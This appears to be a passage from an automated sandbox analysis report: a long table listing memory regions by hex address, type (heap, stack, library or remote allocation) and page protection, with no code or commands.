trusted library allocation
|
page read and write
|
||
|
2FCF000
|
stack
|
page read and write
|
||
|
3829000
|
trusted library allocation
|
page read and write
|
||
|
16FEC450000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B810000
|
trusted library allocation
|
page execute and read and write
|
||
|
974000
|
heap
|
page read and write
|
||
|
9C3D000
|
stack
|
page read and write
|
||
|
16FF0C3D000
|
trusted library allocation
|
page read and write
|
||
|
1CC815F1000
|
trusted library allocation
|
page read and write
|
||
|
975000
|
heap
|
page read and write
|
||
|
16FF0E42000
|
heap
|
page read and write
|
||
|
6D6E000
|
stack
|
page read and write
|
||
|
7FFD9B9F0000
|
trusted library allocation
|
page read and write
|
||
|
1CC80233000
|
trusted library allocation
|
page read and write
|
||
|
50D0000
|
trusted library section
|
page read and write
|
||
|
E50000
|
trusted library allocation
|
page read and write
|
||
|
3801000
|
trusted library allocation
|
page read and write
|
||
|
905000
|
heap
|
page read and write
|
||
|
9C0E000
|
stack
|
page read and write
|
||
|
16FF0CE1000
|
trusted library allocation
|
page read and write
|
||
|
7EE30000
|
trusted library allocation
|
page execute and read and write
|
||
|
2801000
|
trusted library allocation
|
page read and write
|
||
|
1CC8160C000
|
trusted library allocation
|
page read and write
|
||
|
1340000
|
heap
|
page read and write
|
||
|
260D000
|
trusted library allocation
|
page read and write
|
||
|
1CCF6485000
|
heap
|
page read and write
|
||
|
24C04BE000
|
stack
|
page read and write
|
||
|
4CE0000
|
trusted library allocation
|
page read and write
|
||
|
3B58000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA40000
|
trusted library allocation
|
page read and write
|
||
|
27D0000
|
trusted library section
|
page readonly
|
||
|
560000
|
heap
|
page read and write
|
||
|
D743FE000
|
stack
|
page read and write
|
||
|
16FF0EBF000
|
heap
|
page read and write
|
||
|
B2D000
|
heap
|
page read and write
|
||
|
1CCF6130000
|
trusted library allocation
|
page read and write
|
||
|
1CCF43E0000
|
heap
|
page read and write
|
||
|
1CCF674B000
|
heap
|
page read and write
|
||
|
16FEB86F000
|
heap
|
page read and write
|
||
|
1CCF4499000
|
heap
|
page read and write
|
||
|
16FF0E4F000
|
heap
|
page read and write
|
||
|
16FF0D90000
|
remote allocation
|
page read and write
|
||
|
968B000
|
heap
|
page read and write
|
||
|
16FF0BE0000
|
trusted library allocation
|
page read and write
|
||
|
1CC901B3000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B836000
|
trusted library allocation
|
page execute and read and write
|
||
|
1037000
|
heap
|
page read and write
|
||
|
BDC000
|
stack
|
page read and write
|
||
|
16FF0CE0000
|
trusted library allocation
|
page read and write
|
||
|
16FEB902000
|
heap
|
page read and write
|
||
|
32E0000
|
heap
|
page read and write
|
||
|
2601000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B901000
|
trusted library allocation
|
page read and write
|
||
|
332E000
|
unkown
|
page read and write
|
||
|
24C00FE000
|
stack
|
page read and write
|
||
|
6F00000
|
trusted library allocation
|
page read and write
|
||
|
16FEB8A6000
|
heap
|
page read and write
|
||
|
25EB000
|
trusted library allocation
|
page read and write
|
||
|
CF0000
|
trusted library allocation
|
page read and write
|
||
|
336F000
|
unkown
|
page read and write
|
||
|
34D0000
|
heap
|
page read and write
|
||
|
98BE000
|
stack
|
page read and write
|
||
|
24C0000
|
trusted library allocation
|
page read and write
|
||
|
16FEC5C1000
|
trusted library allocation
|
page read and write
|
||
|
9E8C000
|
stack
|
page read and write
|
||
|
96D000
|
heap
|
page read and write
|
||
|
1CCF66E8000
|
heap
|
page read and write
|
||
|
CD7000
|
trusted library allocation
|
page execute and read and write
|
||
|
988D000
|
stack
|
page read and write
|
||
|
A32C000
|
stack
|
page read and write
|
||
|
16FEB800000
|
heap
|
page read and write
|
||
|
16FF0E2E000
|
heap
|
page read and write
|
||
|
B77000
|
heap
|
page read and write
|
||
|
24C05BE000
|
stack
|
page read and write
|
||
|
16FF0D20000
|
trusted library allocation
|
page read and write
|
||
|
1CCF44DB000
|
heap
|
page read and write
|
||
|
7FFD9B940000
|
trusted library allocation
|
page execute and read and write
|
||
|
24C114E000
|
stack
|
page read and write
|
||
|
1CCF4490000
|
heap
|
page read and write
|
||
|
24C8000
|
trusted library allocation
|
page read and write
|
||
|
AEF000
|
unkown
|
page read and write
|
||
|
6CFE000
|
trusted library allocation
|
page read and write
|
||
|
5260000
|
trusted library allocation
|
page read and write
|
||
|
16FF0CD8000
|
trusted library allocation
|
page read and write
|
||
|
67A000
|
stack
|
page read and write
|
||
|
99CE000
|
stack
|
page read and write
|
||
|
8DE000
|
heap
|
page read and write
|
||
|
16FEC6F0000
|
trusted library allocation
|
page read and write
|
||
|
1FA000
|
stack
|
page read and write
|
||
|
16FEB929000
|
heap
|
page read and write
|
||
|
99BE000
|
stack
|
page read and write
|
||
|
277B000
|
trusted library allocation
|
page read and write
|
||
|
16FF0C08000
|
trusted library allocation
|
page read and write
|
||
|
4A40000
|
trusted library allocation
|
page read and write
|
||
|
1CC81C35000
|
trusted library allocation
|
page read and write
|
||
|
16FEB917000
|
heap
|
page read and write
|
||
|
AA0000
|
trusted library allocation
|
page read and write
|
||
|
B60000
|
trusted library allocation
|
page read and write
|
||
|
27E0000
|
heap
|
page read and write
|
||
|
24C134E000
|
stack
|
page read and write
|
||
|
50AE000
|
stack
|
page read and write
|
||
|
16FF0EF6000
|
heap
|
page read and write
|
||
|
2751000
|
trusted library allocation
|
page read and write
|
||
|
2780000
|
trusted library allocation
|
page read and write
|
||
|
AAE000
|
unkown
|
page read and write
|
||
|
24C12CC000
|
stack
|
page read and write
|
||
|
964F000
|
stack
|
page read and write
|
||
|
4D30000
|
trusted library allocation
|
page read and write
|
||
|
16FEB88A000
|
heap
|
page read and write
|
||
|
7FFD9BA50000
|
trusted library allocation
|
page read and write
|
||
|
820000
|
trusted library allocation
|
page read and write
|
||
|
16FEB902000
|
heap
|
page read and write
|
||
|
24BFFFE000
|
stack
|
page read and write
|
||
|
7FFD9BA10000
|
trusted library allocation
|
page read and write
|
||
|
6B1E000
|
stack
|
page read and write
|
||
|
9D7E000
|
stack
|
page read and write
|
||
|
16FEB8AF000
|
heap
|
page read and write
|
||
|
24C108E000
|
stack
|
page read and write
|
||
|
1CC815FE000
|
trusted library allocation
|
page read and write
|
||
|
27A0000
|
trusted library allocation
|
page read and write
|
||
|
26B0000
|
heap
|
page execute and read and write
|
||
|
24BFF7E000
|
stack
|
page read and write
|
||
|
475000
|
remote allocation
|
page execute and read and write
|
||
|
272F000
|
stack
|
page read and write
|
||
|
33AE000
|
stack
|
page read and write
|
||
|
1CCF6437000
|
heap
|
page read and write
|
||
|
5040000
|
trusted library allocation
|
page read and write
|
||
|
B02000
|
heap
|
page read and write
|
||
|
25E0000
|
trusted library allocation
|
page read and write
|
||
|
B63000
|
heap
|
page read and write
|
||
|
12FE000
|
stack
|
page read and write
|
||
|
16FF0C81000
|
trusted library allocation
|
page read and write
|
||
|
2757000
|
trusted library allocation
|
page read and write
|
||
|
2633000
|
heap
|
page read and write
|
||
|
4EC0000
|
heap
|
page read and write
|
||
|
24C017D000
|
stack
|
page read and write
|
||
|
7FFD9B76B000
|
trusted library allocation
|
page read and write
|
||
|
16FF0E21000
|
heap
|
page read and write
|
||
|
2428000
|
trusted library allocation
|
page read and write
|
||
|
824000
|
trusted library allocation
|
page read and write
|
||
|
1CCF6435000
|
heap
|
page read and write
|
||
|
6E00000
|
trusted library allocation
|
page read and write
|
||
|
52C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
24D0000
|
heap
|
page read and write
|
||
|
241E000
|
stack
|
page read and write
|
||
|
2D70000
|
heap
|
page read and write
|
||
|
12A3000
|
heap
|
page read and write
|
||
|
8D0000
|
heap
|
page read and write
|
||
|
2762000
|
trusted library allocation
|
page read and write
|
||
|
D746FE000
|
unkown
|
page readonly
|
||
|
1CCF6760000
|
heap
|
page read and write
|
||
|
2A01000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B753000
|
trusted library allocation
|
page execute and read and write
|
||
|
9CD000
|
heap
|
page read and write
|
||
|
16FF0E00000
|
heap
|
page read and write
|
||
|
1CCF64CF000
|
heap
|
page read and write
|
||
|
7F100000
|
trusted library allocation
|
page execute and read and write
|
||
|
4D60000
|
heap
|
page read and write
|
||
|
7FFD9B9A0000
|
trusted library allocation
|
page read and write
|
||
|
1CCF64AA000
|
heap
|
page read and write
|
||
|
24C02BE000
|
stack
|
page read and write
|
||
|
4CF0000
|
heap
|
page execute and read and write
|
||
|
16FECB70000
|
trusted library allocation
|
page read and write
|
||
|
8A0000
|
heap
|
page read and write
|
||
|
16FF0CE0000
|
trusted library allocation
|
page read and write
|
||
|
46E000
|
remote allocation
|
page execute and read and write
|
||
|
16FEBF00000
|
heap
|
page read and write
|
||
|
9D8C000
|
stack
|
page read and write
|
||
|
99FE000
|
stack
|
page read and write
|
||
|
28FA000
|
trusted library allocation
|
page read and write
|
||
|
9F70000
|
heap
|
page read and write
|
||
|
16FF0D40000
|
trusted library allocation
|
page read and write
|
||
|
2760000
|
trusted library allocation
|
page read and write
|
||
|
5300000
|
heap
|
page read and write
|
||
|
16FF0CE4000
|
trusted library allocation
|
page read and write
|
||
|
2844000
|
trusted library allocation
|
page read and write
|
||
|
16FF0F10000
|
heap
|
page read and write
|
||
|
B73000
|
heap
|
page read and write
|
||
|
507E000
|
heap
|
page read and write
|
||
|
16FEB813000
|
heap
|
page read and write
|
||
|
1CC81AEA000
|
trusted library allocation
|
page read and write
|
||
|
AF4000
|
heap
|
page read and write
|
||
|
36E9000
|
trusted library allocation
|
page read and write
|
||
|
4E00000
|
heap
|
page read and write
|
||
|
2FF0000
|
heap
|
page read and write
|
||
|
846000
|
trusted library allocation
|
page execute and read and write
|
||
|
2F79000
|
stack
|
page read and write
|
||
|
6FBE000
|
stack
|
page read and write
|
||
|
D740FE000
|
unkown
|
page readonly
|
||
|
16FEB88C000
|
heap
|
page read and write
|
||
|
16FF0BF8000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA00000
|
trusted library allocation
|
page read and write
|
||
|
273B000
|
trusted library allocation
|
page read and write
|
||
|
16FF0CAA000
|
trusted library allocation
|
page read and write
|
||
|
1CCF44D7000
|
heap
|
page read and write
|
||
|
2730000
|
trusted library allocation
|
page read and write
|
||
|
16FF0C10000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA30000
|
trusted library allocation
|
page read and write
|
||
|
85B000
|
trusted library allocation
|
page execute and read and write
|
||
|
D742FE000
|
unkown
|
page readonly
|
||
|
24CB000
|
trusted library allocation
|
page read and write
|
||
|
16FEBF04000
|
heap
|
page read and write
|
||
|
16FEBF02000
|
heap
|
page read and write
|
||
|
16FF0EC1000
|
heap
|
page read and write
|
||
|
5065000
|
heap
|
page read and write
|
||
|
90E000
|
heap
|
page read and write
|
||
|
1CCF4516000
|
heap
|
page read and write
|
||
|
24C01FD000
|
stack
|
page read and write
|
||
|
16FEB879000
|
heap
|
page read and write
|
||
|
29FC000
|
trusted library allocation
|
page read and write
|
||
|
16FF0D30000
|
trusted library allocation
|
page read and write
|
||
|
1030000
|
heap
|
page read and write
|
||
|
6BF0000
|
trusted library allocation
|
page read and write
|
||
|
16FEBE15000
|
heap
|
page read and write
|
||
|
1CC81AEC000
|
trusted library allocation
|
page read and write
|
||
|
CDB000
|
trusted library allocation
|
page execute and read and write
|
||
|
4D00000
|
heap
|
page read and write
|
||
|
1CCF5DB5000
|
heap
|
page read and write
|
||
|
D744FE000
|
unkown
|
page readonly
|
||
|
16FF0C90000
|
trusted library allocation
|
page read and write
|
||
|
36C1000
|
trusted library allocation
|
page read and write
|
||
|
1CCF6133000
|
trusted library allocation
|
page read and write
|
||
|
9F81000
|
heap
|
page read and write
|
||
|
1CCF6744000
|
heap
|
page read and write
|
||
|
5050000
|
trusted library allocation
|
page read and write
|
||
|
E87000
|
heap
|
page read and write
|
||
|
978D000
|
stack
|
page read and write
|
||
|
16FF0BF2000
|
trusted library allocation
|
page read and write
|
||
|
82D000
|
trusted library allocation
|
page execute and read and write
|
||
|
24C043E000
|
stack
|
page read and write
|
||
|
16FEB85B000
|
heap
|
page read and write
|
||
|
1CCF5D40000
|
heap
|
page readonly
|
||
|
1CC81811000
|
trusted library allocation
|
page read and write
|
||
|
4D57000
|
heap
|
page read and write
|
||
|
82000
|
unkown
|
page readonly
|
||
|
DB6000
|
heap
|
page read and write
|
||
|
6F0F000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BAA0000
|
trusted library allocation
|
page read and write
|
||
|
1CCF42E0000
|
heap
|
page read and write
|
||
|
7FFD9B9D0000
|
trusted library allocation
|
page read and write
|
||
|
4C3D000
|
stack
|
page read and write
|
||
|
D73FFE000
|
stack
|
page read and write
|
||
|
16FEBF13000
|
heap
|
page read and write
|
||
|
1210000
|
heap
|
page read and write
|
||
|
640000
|
heap
|
page read and write
|
||
|
16FEB8BA000
|
heap
|
page read and write
|
||
|
8B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
16FF0E90000
|
heap
|
page read and write
|
||
|
8F7000
|
heap
|
page read and write
|
||
|
7FFD9B75D000
|
trusted library allocation
|
page execute and read and write
|
||
|
1CCF6479000
|
heap
|
page read and write
|
||
|
16FF0EC5000
|
heap
|
page read and write
|
||
|
26C1000
|
trusted library allocation
|
page read and write
|
||
|
2650000
|
trusted library allocation
|
page read and write
|
||
|
6F30000
|
trusted library allocation
|
page execute and read and write
|
||
|
1CCF6795000
|
heap
|
page read and write
|
||
|
1CC80C33000
|
trusted library allocation
|
page read and write
|
||
|
16FEBF1A000
|
heap
|
page read and write
|
||
|
33EF000
|
stack
|
page read and write
|
||
|
16FF0CC0000
|
trusted library allocation
|
page read and write
|
||
|
392F000
|
stack
|
page read and write
|
||
|
16FF0C05000
|
trusted library allocation
|
page read and write
|
||
|
6A1E000
|
stack
|
page read and write
|
||
|
24C0279000
|
stack
|
page read and write
|
||
|
24C110D000
|
stack
|
page read and write
|
||
|
FFE000
|
stack
|
page read and write
|
||
|
2B6E000
|
stack
|
page read and write
|
||
|
A22B000
|
stack
|
page read and write
|
||
|
CBF000
|
stack
|
page read and write
|
||
|
1CCF66D0000
|
heap
|
page read and write
|
||
|
1CCF6754000
|
heap
|
page read and write
|
||
|
16FEB630000
|
heap
|
page read and write
|
||
|
7E85000
|
trusted library allocation
|
page read and write
|
||
|
16FF0C54000
|
trusted library allocation
|
page read and write
|
||
|
83D000
|
trusted library allocation
|
page execute and read and write
|
||
|
27BF000
|
trusted library allocation
|
page read and write
|
||
|
B0E000
|
stack
|
page read and write
|
||
|
7FFD9BA70000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B800000
|
trusted library allocation
|
page read and write
|
||
|
1CC90010000
|
trusted library allocation
|
page read and write
|
||
|
16FEC190000
|
trusted library allocation
|
page read and write
|
||
|
16FF0BF1000
|
trusted library allocation
|
page read and write
|
||
|
5280000
|
trusted library allocation
|
page execute and read and write
|
||
|
5060000
|
trusted library allocation
|
page execute and read and write
|
||
|
4D3E000
|
heap
|
page read and write
|
||
|
ACA000
|
heap
|
page read and write
|
||
|
4EB0000
|
heap
|
page read and write
|
||
|
729E000
|
stack
|
page read and write
|
||
|
48FB000
|
stack
|
page read and write
|
||
|
8AB000
|
heap
|
page read and write
|
||
|
1CC81610000
|
trusted library allocation
|
page read and write
|
||
|
911000
|
heap
|
page read and write
|
||
|
E2E000
|
stack
|
page read and write
|
||
|
4D39000
|
trusted library allocation
|
page read and write
|
||
|
50E0000
|
trusted library allocation
|
page read and write
|
||
|
9B00000
|
heap
|
page read and write
|
||
|
1CCF65C0000
|
heap
|
page execute and read and write
|
||
|
7FFD9B920000
|
trusted library allocation
|
page execute and read and write
|
||
|
857000
|
trusted library allocation
|
page execute and read and write
|
||
|
2620000
|
trusted library allocation
|
page read and write
|
||
|
16FF0E55000
|
heap
|
page read and write
|
||
|
ACE000
|
stack
|
page read and write
|
||
|
778000
|
stack
|
page read and write
|
||
|
860000
|
heap
|
page read and write
|
||
|
28AE000
|
trusted library allocation
|
page read and write
|
||
|
80000
|
unkown
|
page readonly
|
||
|
16FEB840000
|
heap
|
page read and write
|
||
|
1CCF6765000
|
heap
|
page read and write
|
||
|
5070000
|
heap
|
page read and write
|
||
|
16FF0D00000
|
trusted library allocation
|
page read and write
|
||
|
1CCF65C7000
|
heap
|
page execute and read and write
|
||
|
D745F9000
|
stack
|
page read and write
|
||
|
9D0E000
|
stack
|
page read and write
|
||
|
7FFD9B9C0000
|
trusted library allocation
|
page read and write
|
||
|
16FEBF1A000
|
heap
|
page read and write
|
||
|
3C0F000
|
trusted library allocation
|
page read and write
|
||
|
DA0000
|
heap
|
page execute and read and write
|
||
|
5050000
|
trusted library allocation
|
page execute and read and write
|
||
|
1CCF43C0000
|
heap
|
page read and write
|
||
|
1CCF64ED000
|
heap
|
page read and write
|
||
|
4A80000
|
trusted library allocation
|
page execute and read and write
|
||
|
4FF0000
|
trusted library allocation
|
page read and write
|
||
|
24C11CE000
|
stack
|
page read and write
|
||
|
7FFD9B960000
|
trusted library allocation
|
page read and write
|
||
|
D749FB000
|
stack
|
page read and write
|
||
|
2778000
|
trusted library allocation
|
page read and write
|
||
|
16FF1250000
|
trusted library allocation
|
page read and write
|
||
|
1CCF6758000
|
heap
|
page read and write
|
||
|
27F0000
|
heap
|
page read and write
|
||
|
9C4000
|
heap
|
page read and write
|
||
|
24BFBE3000
|
stack
|
page read and write
|
||
|
6E6F000
|
stack
|
page read and write
|
||
|
16FEB710000
|
heap
|
page read and write
|
||
|
16FF1240000
|
trusted library allocation
|
page read and write
|
||
|
24C03BD000
|
stack
|
page read and write
|
||
|
16FF0C30000
|
trusted library allocation
|
page read and write
|
||
|
4D1B000
|
stack
|
page read and write
|
||
|
90D000
|
stack
|
page read and write
|
||
|
5002000
|
trusted library allocation
|
page read and write
|
||
|
E80000
|
heap
|
page read and write
|
||
|
2606000
|
trusted library allocation
|
page read and write
|
||
|
16FF0CEC000
|
trusted library allocation
|
page read and write
|
||
|
5272000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B932000
|
trusted library allocation
|
page read and write
|
||
|
16FF0CF7000
|
trusted library allocation
|
page read and write
|
||
|
1CC81AF4000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B9E0000
|
trusted library allocation
|
page read and write
|
||
|
24C06BB000
|
stack
|
page read and write
|
There are 638 hidden memdumps, click here to show them.